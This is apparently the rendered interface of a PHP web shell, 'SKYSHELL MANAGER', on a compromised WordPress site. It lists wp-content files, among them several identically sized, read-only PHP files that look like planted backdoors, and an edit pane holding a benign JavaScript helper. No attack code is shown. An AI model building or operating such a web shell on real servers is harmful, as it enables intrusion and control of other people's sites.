📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: CanonicalNumericIndexString.js
'use strict'; var GetIntrinsic = require('get-intrinsic'); var $TypeError = GetIntrinsic('%TypeError%'); var SameValue = require('./SameValue'); var ToNumber = require('./ToNumber'); var ToString = require('./ToString'); var Type = require('./Type'); // https://ecma-international.org/ecma-262/6.0/#sec-canonicalnumericindexstring module.exports = function CanonicalNumericIndexString(argument) { if (Type(argument) !== 'String') { throw new $TypeError('Assertion failed: `argument` must be a String'); } if (argument === '-0') { return -0; } var n = ToNumber(argument); if (SameValue(ToString(n), argument)) { return n; } return void 0; };
Save